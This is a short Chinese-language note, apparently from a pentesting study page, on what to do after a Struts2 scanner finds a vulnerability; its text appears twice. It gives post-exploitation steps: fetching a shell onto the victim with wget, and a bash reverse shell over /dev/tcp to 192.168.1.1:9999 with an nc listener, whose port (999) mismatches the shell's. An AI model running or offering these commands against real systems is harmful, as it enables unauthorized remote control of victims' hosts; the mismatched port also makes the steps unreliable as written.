思考:
利用常见的struts2漏洞检查工具发现有漏洞后该如何进一步操作呢?
参考思路:
1、wget下载shell到受害主机上进行操作
2、利用bash 反弹一个shell,用nc连接(受害主机上执行 bash -i >& /dev/tcp/192.168.1.1/9999 0>&1,攻击者的主机上执行 nc -lvnp 999)
利用常见的struts2漏洞检查工具发现有漏洞后该如何进一步操作呢?
1、wget下载shell到受害主机上进行操作
2、利用bash 反弹一个shell,用nc连接(受害主机上执行 bash -i >& /dev/tcp/192.168.1.1/9999 0>&1,攻击者的主机上执行 nc -lvnp 999)